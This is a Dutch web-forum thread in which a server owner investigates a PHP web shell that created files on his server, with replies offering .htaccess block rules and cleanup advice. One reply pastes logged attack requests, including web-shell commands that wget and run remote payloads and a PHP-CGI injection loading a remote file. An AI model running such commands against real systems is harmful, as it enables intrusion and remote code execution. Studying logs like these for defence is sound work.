Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

Vreemde exploit op server maakt bestanden aan

Pagina: 1
Acties:

  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 10:13

AW_Bos

Liefhebber van nostalgie... 🕰️

Topicstarter
Op een server heb ik ontdekt dat een vreemde merkwaardige exploit het voormekaar heeft gekregen om bestanden aan te maken. Het lijkt tot nu toe niet echt schadelijk, wat er gebeurd is:

* Er is een simpele shell geuploadt met eval en $_POST erin.
* Er is een bestand aangemaakt wat de directories uitleest en in alle domein-mappen een onschuldige caches.php bestand aanmaakt van Wordpress (en ik draai zelf geen Wordpress)

Ik heb verder een eigen geschreven CMS zonder ?p-systeem in de URL, en ook geen openbare uploadsystemen.

Ik heb de logs erbij gepakt:
code:
1
2
3
4
5
6
7
8
9
[05/May/2014:10:37:40 +0200] "POST /ls.php HTTP/1.1" 200 358 "http://SITENAAM.nl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
171.221.65.240 - - [05/May/2014:10:37:45 +0200] "POST /ls.php HTTP/1.1" 200 2871 "http://SITENAAM.nl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
171.221.65.240 - - [05/May/2014:10:37:50 +0200] "POST /ls.php HTTP/1.1" 200 795 "http://SITENAAM.nl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
171.221.65.240 - - [05/May/2014:10:37:59 +0200] "POST /ls.php HTTP/1.1" 200 595 "http://SITENAAM.nl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
171.221.65.240 - - [05/May/2014:10:38:01 +0200] "POST /ls.php HTTP/1.1" 200 1097 "http://SITENAAM.nl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
171.221.65.240 - - [05/May/2014:10:38:24 +0200] "POST /ls.php HTTP/1.1" 200 245 "http://SITENAAM.nl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
171.221.65.240 - - [05/May/2014:10:39:09 +0200] "POST /ls.php HTTP/1.1" 200 204 "http://SITENAAM.nl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
171.221.65.240 - - [05/May/2014:10:39:14 +0200] "POST /ls.php HTTP/1.1" 200 2908 "http://SITENAAM.nl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
171.221.65.240 - -

Het bestand is ook daadwerkelijk op dat moment aangemaakt. En dat is buiten FTP of SSH om gebeurd zeggen de logs.

Maar hoe achterhaal ik op welke manier het bestand aangemaakt is? Ik ga uiteraard wel even kijken welke programma's en deamons verouderd zijn, en deze updaten, maar het lek zoeken, daar loop ik op vast.

Verder heb ik al rkhunter gedraaid en dat leverde geen rootkits op, een simpele check op 64base-string leverde ook niks op. Iemand die me verder op weg kan helpen?

Update:
Al eind maart schijnt er een simpele shell geuploadt te zijn. Helaas gaan mijn logbestanden niet zo ver. Wel is deze op 5 mei actief misbruikt door andere uploadshells aan te maken. Deze heb ik verwijderd, en ik ga straks even verder zoeken in mijn webroot naar eval( en move_uploaded_file(
Lang leve 'grep' :P

Ook laat mijn hosting even een controle doen op uitgaand verkeer. Maar ik denk dat het wel meevalt, want anders had ik ze allang aan de mail/telefoon gehad.

[ Voor 10% gewijzigd door AW_Bos op 09-05-2014 09:55 ]

Telecommunicatie van vroeger
🚅Alles over spoor en treintjes


  • DJMaze
  • Registratie: Juni 2002
  • Niet online
Gewoon in .htaccess:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<IfModule mod_setenvif.c>
    # Block bad things
    BrowserMatchNoCase "MSIE ([02-7]|1[^0])" banned

    # deny security
    deny from env=banned
</IfModule>

<IfModule mod_rewrite.c>
    RewriteEngine On

    # PHP-CGI vulnerability https://bugs.php.net/bug.php?id=61910
    RewriteCond %{QUERY_STRING} ^[^=]*$
    RewriteCond %{QUERY_STRING} %2d|\- [NC]
    RewriteRule .? - [F,L]

    # Old bots use HTTP/1.0, Current browsers and bots use HTTP/1.1
    RewriteCond %{SERVER_PROTOCOL} ^HTTP/1\.0
    RewriteCond %{REQUEST_METHOD} ^POST
    RewriteRule .* - [R=412,L]
</IfModule>

Als je namelijk nu nog MSIE 1 t/m 7 gebruikt zou je sowieso niet op internet mogen komen :)

[ Voor 7% gewijzigd door DJMaze op 10-05-2014 22:48 ]

Maak je niet druk, dat doet de compressor maar


  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 10:13

AW_Bos

Liefhebber van nostalgie... 🕰️

Topicstarter
Ik vind dat te rigoureus. :/
Plus dat useragents zijn te faken.

Ik heb geen idee hoe ze wat shells hebben geupload, omdat ik het 2 maanden later tegenkwam. Ik heb geen Joomla of Wordpress draaien. Maar als iemand nog een goede blokkade zou weten als barriere. Dan kan ik aan de hand van de errorlog meer uitzoeken.

Telecommunicatie van vroeger
🚅Alles over spoor en treintjes


  • Brahiewahiewa
  • Registratie: Oktober 2001
  • Laatst online: 30-09-2022

Brahiewahiewa

boelkloedig

AW_Bos schreef op donderdag 08 mei 2014 @ 21:32:
...Ook laat mijn hosting even een controle doen op uitgaand verkeer. Maar ik denk dat het wel meevalt, want anders had ik ze allang aan de mail/telefoon gehad.
Dus je laat de hackers hun gang gaan zolang 't jou niks kost?
Vink bedenkelijk

QnJhaGlld2FoaWV3YQ==


  • ThinkPad
  • Registratie: Juni 2005
  • Laatst online: 14:35
Ik zou backup maken van je bestanden, en reinstall doen van OS.

Je weet nooit wat er nog meer allemaal op die bak zit, en je kunt het dus eigenlijk ook niet vertrouwen.

  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 10:13

AW_Bos

Liefhebber van nostalgie... 🕰️

Topicstarter
Rkhunter geeft weinig spannends aan.

Inmiddels wordt een dezer dager een audit-persoon ingezet die gaat oordelen waarna er aktie wordt ondernomen.

Telecommunicatie van vroeger
🚅Alles over spoor en treintjes


  • Patriot
  • Registratie: December 2004
  • Laatst online: 13:01

Patriot

Fulltime #whatpulsert

Brahiewahiewa schreef op zondag 11 mei 2014 @ 13:55:
[...]

Dus je laat de hackers hun gang gaan zolang 't jou niks kost?
Vink bedenkelijk
:? Hoe haal je dat eruit? Hij zegt alleen dat hij het onwaarschijnlijk vind dat er al te rigoreus omgesprongen is met het lek, omdat de hoster dan wellicht al wat gemerkt had en actie had ondernomen..

  • DJMaze
  • Registratie: Juni 2002
  • Niet online
AW_Bos schreef op zondag 11 mei 2014 @ 10:22:
Ik vind dat te rigoureus. :/
Plus dat useragents zijn te faken.
Natuurlijk zijn die te faken.
Maar als ik jouw log zo zie en de logs van mijn 10 websites is het zo slecht nog niet.
Veel bots faken een user agent maar zijn nooit geupdatet om een recente versie van de agent te gebruiken.
Firefox/3, Firefox/6, Opera/9, MSIE, Chrome/22, Java/, Nutch/, etc. komen regelmatig voorbij.
Ook het zoeken naar /fckeditor/, wp-login, /administrator/ komen genoeg voor.

Waarom zou je het ze niet moeilijker maken?
Zij hebben immers geen clue waarom je ze een 412 error voorschoteld

[ Voor 5% gewijzigd door DJMaze op 13-05-2014 17:26 ]

Maak je niet druk, dat doet de compressor maar


  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 10:13

AW_Bos

Liefhebber van nostalgie... 🕰️

Topicstarter
Wel apart dat er op al mijn domeinen vanmorgen weer een POST-aanroep werd gedaan met ls.php en caches.php.

Uiteraard leverde dit een 403 voor hen op, omdat ik die bestanden in apache geblokkeerd heb. Maar gebeurt exact hetzelfde vaker bij anderen? Bekende exploit ofzo? Zo kan ik achterhalen hoe het ontstaan is....
Dat is altijd mooi meegenomen. :)

Google meldt niet veel spannends dan dit topic. :P

[ Voor 9% gewijzigd door AW_Bos op 14-05-2014 15:35 ]

Telecommunicatie van vroeger
🚅Alles over spoor en treintjes


  • DJMaze
  • Registratie: Juni 2002
  • Niet online
Hier een lijstje met attempts op mijn server:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
/FCK/editor/js/fckeditorcode_ie.js
/FCK/fckeditor.js
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
/administrator/editors/fckeditor/editor/filemanager/upload/test.html
/bbadmin/editors/fckeditor/editor/filemanager/upload/test.html
/editor/js/fckeditorcode_ie.js
/editors/fckeditor/editor/filemanager/upload/php/upload.php
/editors/fckeditor/editor/filemanager/upload/test.html
/fck/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/fck/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/fckeditor.js
/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=/
/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=/
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=/
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
/fckeditor/editor/filemanager/upload/php/upload.php
/fckeditor/editor/js/fckeditorcode_ie.js
/fckeditor/fckeditor.js
/fckeditorcode_ie.js
/includes/editors/fckeditor/editor/filemanager/upload/test.html
/lib/fckeditor/fckconfig.js
/FCK/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/FCK/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/FCKEDITOR/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mark&NewFolderName=mark
/FCKEDITOR/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/ok.asp&NewFolderName=ok.asp
/FCKedit/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/ok.asp&NewFolderName=ok.asp
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=/mark&NewFolderName=mark
/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/FCKeditor/editor/filemanager/connectors/uploadtest.html
/FCKeditor1/editor/filemanager/connectors/uploadtest.html
/FCKeditor_Ap/editor/filemanager/connectors/uploadtest.html
/includes/FCKeditor/editor/filemanager/upload/php/upload.php

/ckfinder/core/connector/asp/connector.asp
/ckfinder/core/connector/aspx/connector.aspx
/editor/ckfinder/core/connector/asp/connector.asp

/Southidceditor/Dialog/about.htm
/Southidceditor/js/buttons.js
/ckeditor/ckeditor.js
/cuteeditor_files/Help/default.htm
/cuteeditor_files/Scripts/spell.js
/editor/Dialog/about.htm
/editor/Help/default.htm
/editor/Include/Editor.js
/editor/Scripts/spell.js
/editor/editor/filemanager/upload/php/upload.php
/editor/filemanager/connectors/uploadtest.html
/kindeditor/kindeditor-min.js
/kindeditor/kindeditor.js
/kindeditor/license.txt
/mods/ckeditor/filemanager/connectors/uploadtest.html
/plugin/kindeditor/kindeditor-min.js
/plugin/kindeditor/kindeditor.js
/plugin/kindeditor/license.txt
/plugins/tinymce_plugin/tiny_mce/plugins/more/editor_plugin.js
/statics/js/ckeditor/plugins/capture/plugin.js
/ueditor/editor_all.js
/ueditor/editor_config.js
/Editor/assetmanager/assetmanager.asp
/Include/Editor.js
/eWebEditor/Dialog/about.htm
/eWebEditor/Include/Editor.js
/lionsky_client/WebHtmlEditor/1_7_2006_1020/Theme/Office_Tinge/WebHtmlEditor.css
/manage/Editor/assetmanager/assetmanager.asp
/edit/assetmanager/assetmanager.asp

/components/com_community/index.html
/components/com_contact/index.php
/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php
/administrator/
/administrator/components/com_config/index.html
/administrator/components/com_adsmanager/adsmanager.xml
/administrator/manifests/files/joomla.xml
/administrator/index.php
/administrator/FCKeditor/editor/filemanager/connectors/uploadtest.html
/administrator/FCKeditor1/editor/filemanager/connectors/uploadtest.html
/jeugdzeilen/wp-login.php
/wp-admin
/wp-admin/includes/class-wp-theme-edit.php
/wp-adminindex.php
/wp-content/plugins/all-video-gallery/allvideogallery.css
/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
/wp-content/plugins/wp-property/js/wp-property-backend-global.js
/wp-content/plugins/wp-property/js/wp-property-global.js
/wp-content/plugins/wp-property/readme.txt
/wp-content/themes/twentyten/images/index.php
/wp-content/themes/twentyten/style.css
/wp-includes/ixwstat.php
/wp-includes/pomo/session.php
/wp-login.php
/wp-login.php?action=register
/wp-signup.php

//images/stories/racrew.php?cmd=wget%20http://jce.altervista.org/componentz.zip%20;%20unzip%20componentz.zip%20;%20rm%20-rf%20componentz.zip
//images/stories/racrew.php?cmd=cd%20/tmp%20;wget%20http://picasa.com.rnt.ca/ec.txt%20;%20php%20ec.txt%20;%20rm%20-rf%20ec.txt
//images/stories/racrew.php?rf

/LICESNE.php

/Admin/Include/version.xml
/Resource/Cache/City.xml
/api/Request.xml
/api/Response.xml
/api/api_user.xml
/app/code/core/Mage/Admin/etc/config.xml
/browserconfig.xml
/crossdomain.xml
/data/xml/supply.xml
/extensions/jcms/info.xml
/gbook/_notes/dwsync.xml
/hotspots.xml
/inc/playerKinds.xml
/install/resources/mybb_theme.xml
/language/gb2312.xml
/plugin/backupdb/plugin.xml
/plus/comment/setting.xml
/plus/count/setting.xml
/plus/digg/setting.xml
/plus/public/setting.xml
/plus/repair/setting.xml
/plus/search/setting.xml
/plus/webftp/setting.xml
/plus/webrpc/setting.xml
/system/language/zh-cn.xml
/themes/purple/info.xml
/themes/purple/theme.xml
/virtuemart.xml
/wlwmanifest.xml
/xml_language/lang[arabic].xml

/phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation%3d1+-d+disable_functions%3d''+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp://www.lelilai.net/1.txt+-n


Je moet je dus niet al te druk maken als je geen Joomla, WordPress, wysiwyg gebruikt ;)

Wel zorgen dat een PUT request niet werkt.
Met PUT upload je namelijk bestanden naar een server (WebDAV request)

En verder zorgen dat er geen bestand op de server staat waarmee je $_FILES upload.

Maak je niet druk, dat doet de compressor maar


  • TRON
  • Registratie: September 2001
  • Laatst online: 27-11 12:50
AW_Bos schreef op donderdag 08 mei 2014 @ 21:32:
[...]

Update:
Al eind maart schijnt er een simpele shell geuploadt te zijn. Helaas gaan mijn logbestanden niet zo ver. Wel is deze op 5 mei actief misbruikt door andere uploadshells aan te maken. Deze heb ik verwijderd, en ik ga straks even verder zoeken in mijn webroot naar eval( en move_uploaded_file(
Lang leve 'grep' :P

Ook laat mijn hosting even een controle doen op uitgaand verkeer. Maar ik denk dat het wel meevalt, want anders had ik ze allang aan de mail/telefoon gehad.
Let op dat code ook obfuscated kan zijn, dan kan het zo zijn dat je het woord 'eval' zelfs niet meer terugziet.

Controleer dus even welke bestanden recent zijn aangepast en loop deze na.

Leren door te strijden? Dat doe je op CTFSpel.nl. Vraag een gratis proefpakket aan t.w.v. EUR 50 (excl. BTW)


  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 10:13

AW_Bos

Liefhebber van nostalgie... 🕰️

Topicstarter
Ook op base64 heb ik gescanned. Niks meer gevonden....
Blijft nog wel de vraag hoe die Chinezen op mijn server zijn gekomen? Inmiddels is er een hoop gecontroleerd en geupdated, plus dat er wordt gelogged.

Telecommunicatie van vroeger
🚅Alles over spoor en treintjes


  • TRON
  • Registratie: September 2001
  • Laatst online: 27-11 12:50
AW_Bos schreef op donderdag 15 mei 2014 @ 19:18:
Ook op base64 heb ik gescanned. Niks meer gevonden....
Blijft nog wel de vraag hoe die Chinezen op mijn server zijn gekomen? Inmiddels is er een hoop gecontroleerd en geupdated, plus dat er wordt gelogged.
Ook Base64 is niet afdoende. Echt even de last modified date checken.

Zie bijvoorbeeld: http://stackoverflow.com/...exploitable-php-functions

'k Heb laatst ook een voorbeeld gezien die wel erg creepy was. 'k Kan het helaas even nie meer vinden, maar dat was iets van:
PHP:
1
+((!+[]+!![]+[])+(+[]+[])+(+!![]+[])+(!+[]+!![]+!![]+!![]+[]))

Leren door te strijden? Dat doe je op CTFSpel.nl. Vraag een gratis proefpakket aan t.w.v. EUR 50 (excl. BTW)


  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 10:13

AW_Bos

Liefhebber van nostalgie... 🕰️

Topicstarter
Klopt dat is een hele nasty truuk om JS-code te minifien.

Ik merk dat ik af en toe nog steeds vage requests op al mijn domeinnamen heb naar chaches.php en ls.php, maar tevergeefs, de bestanden zijn er niet meer, en het lek lijkt gedicht.
Op internet lees ik niks over een dergelijke exploit of botnet die deze probeert aan te roepen.

Toch blijf ik het interessant vinden, want hoe kunnen ze achterhalen welke domeinnamen er op mijn server draait? Er zit voor zover ik weet geen nameserver op, dus diggen gaat ze ook niet lukken, of ze hebben ergens een database staan waarmee ze de boel afscannen?

Telecommunicatie van vroeger
🚅Alles over spoor en treintjes


  • Booster
  • Registratie: Februari 2000
  • Laatst online: 15-11 18:34

Booster

Superuser

Iets wat ik in de praktijk nog wel eens tegenkom, is dat er geen sprake is van een vulnerability in de website, maar van een gestolen FTP-wachtwoord.

Het stelen hoeft niet persee gebeurt te zijn vanaf je eigen werkstation, maar ook op openbare PC's of een PC van een collega kunnen opgeslagen user/pass combi's achterblijven na een FTP-login. Sommige virussen en malware weten waar deze gegevens staan en sturen die naar de C&C server voor collectie. Jaren later worden deze gegevens misbruikt om eigenlijk heel 'transparant' malware, drive-by's en andere onzin te plaatsen.

Lang verhaal kort: check ook je FTP-log.

The cake is a lie | The Borealis awaits...


  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 10:13

AW_Bos

Liefhebber van nostalgie... 🕰️

Topicstarter
Die was 'clean', evenals mijn PC.

Telecommunicatie van vroeger
🚅Alles over spoor en treintjes


Verwijderd

Zelf ook soortgelijk iets meegemaakt, maar dat was alweer een paar jaar terug. Die waren via een FTP account binnengekomen waar een klant toegang tot had.

Scripts verwijderd en FTP omgezet naar een white-list.

Heb je ergens een upload mogelijkheid zitten op de website? Dan kan een script ook via die methode zijn binnengekomen. Zo zijn er exploits om php scripts als gif te uploaden, om ze daarna af te trappen.

Tip: ga nooit uit van de mime-type die je van de browser meekrijgt, gezien die niet consequent zijn en te bovendien te faken.

  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 10:13

AW_Bos

Liefhebber van nostalgie... 🕰️

Topicstarter

Even ter duidelijkheid! Dit is een oud topic van een ruim jaar oud ;)

Het probleem is inmiddels al lang en breed opgelost na een re-install (for zekerheid).

Maar verdere discussie mag zeker nog wel plaatsvinden hoor :).

[ Voor 20% gewijzigd door AW_Bos op 06-08-2015 12:38 ]

Telecommunicatie van vroeger
🚅Alles over spoor en treintjes


Verwijderd

AW_Bos schreef op woensdag 28 mei 2014 @ 22:46:
Toch blijf ik het interessant vinden, want hoe kunnen ze achterhalen welke domeinnamen er op mijn server draait? Er zit voor zover ik weet geen nameserver op, dus diggen gaat ze ook niet lukken, of ze hebben ergens een database staan waarmee ze de boel afscannen?
vaak kun je dmv een php shell al een hele hoop
op slecht geconfigureerde servers kun je zo gebruikers achterhalen en zelfs door alle andere vhosts browsen, reverse cmd shells spawnen, etc

google r57.txt of c99.txt

en ja oude thread lol maar er word naar gelinked via tweakers homepage
iig info voor mensen die nog lezen/volgen

[ Voor 8% gewijzigd door Verwijderd op 12-07-2015 10:45 ]

Pagina: 1